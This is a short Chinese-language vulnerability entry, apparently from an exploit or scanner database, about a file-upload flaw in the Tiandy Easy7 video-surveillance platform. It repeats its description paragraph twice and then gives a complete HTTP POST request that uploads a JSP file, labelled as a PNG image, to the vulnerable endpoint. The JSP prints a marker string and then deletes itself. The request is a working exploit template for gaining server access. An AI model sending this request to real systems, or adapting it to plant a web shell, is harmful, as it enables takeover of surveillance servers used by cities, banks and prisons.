Description
天地伟业Easy7是由天地伟业技术有限公司推出的一款安防视频监控管理平台,提供视频监控设备接入、管理、播放、录像、存储、回放等核心功能,广泛应用于平安城市、智慧交通、金融安防、教育监控、司法监狱等安防场景。该系统支持多种视频设备接入,提供Web管理平台和移动端应用。天地伟业Easy7的 /Easy7/rest/file/uploadLedImage 接口存在文件上传漏洞,攻击者可通过构造恶意jsp文件上传到服务器,获取服务器系统权限。
天地伟业Easy7是由天地伟业技术有限公司推出的一款安防视频监控管理平台,提供视频监控设备接入、管理、播放、录像、存储、回放等核心功能,广泛应用于平安城市、智慧交通、金融安防、教育监控、司法监狱等安防场景。该系统支持多种视频设备接入,提供Web管理平台和移动端应用。天地伟业Easy7的 /Easy7/rest/file/uploadLedImage 接口存在文件上传漏洞,攻击者可通过构造恶意jsp文件上传到服务器,获取服务器系统权限。
POST /Easy7/rest/file/uploadLedImage?objId=1&width=0&height=0 HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
Content-Length: 270
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Connection: close
Accept-Encoding: gzip
------WebKitFormBoundary
Content-Disposition: form-data; name="file"; filename="1.jsp"
Content-Type: image/png
<%out.println("3CmvBVRAQKl05ZYUV4Tdw4BG0ID");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
------WebKitFormBoundary--
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.